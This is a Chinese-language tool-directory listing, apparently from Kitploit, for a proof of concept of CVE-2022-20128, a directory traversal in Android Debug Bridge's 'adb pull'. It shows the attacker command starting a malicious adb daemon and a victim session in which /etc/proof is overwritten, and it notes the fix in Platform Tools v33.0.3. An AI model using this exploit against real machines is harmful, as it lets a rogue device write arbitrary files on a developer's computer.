Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-20128 — Android 调试桥(adb)曾易受目录遍历攻击影响,恶意的或被入侵的 adb 守护进程可在 adb pull 操作期间发起此类攻击。 | Kitploit
工具/GitHubGitHub/irsl/cve-2022-20128
Android安全漏洞分析漏洞利用渗透测试移动安全
GitHubirsl/cve-2022-20128

CVE-2022-20128

Android 调试桥(adb)曾易受目录遍历攻击影响,恶意的或被入侵的 adb 守护进程可在 adb pull 操作期间发起此类攻击。

查看仓库
843年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-20128

Android Debug Bridge (adb) 在执行 adb pull 操作时容易受到目录遍历攻击,此类攻击可能由恶意/被入侵的 adb 守护进程发起。

恶意设备:

root@kitploit:~
./adbdirtrav.py -lp 5111 --content "hello world" --destination-path /etc/proof

受害者:

root@kitploit:~
root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
cat: /etc/proof: No such file or directory

root@eedd4cb8b202:/tmp/platform-tools# ./adb connect 10.6.8.145:5111
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 10.6.8.145:5111

root@eedd4cb8b202:/tmp/platform-tools# ./adb devices
List of devices attached
10.6.8.145:5111  device

root@eedd4cb8b202:/tmp/platform-tools# ./adb pull /data/local/tmp/1 /tmp/sdfsdf
/data/local/tmp/1/: 1 file pulled, 0 skipped. 0.0 MB/s (11 bytes in 0.150s)

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
hello world

此漏洞已在 Platform Tools v33.0.3 中修复。

下载工具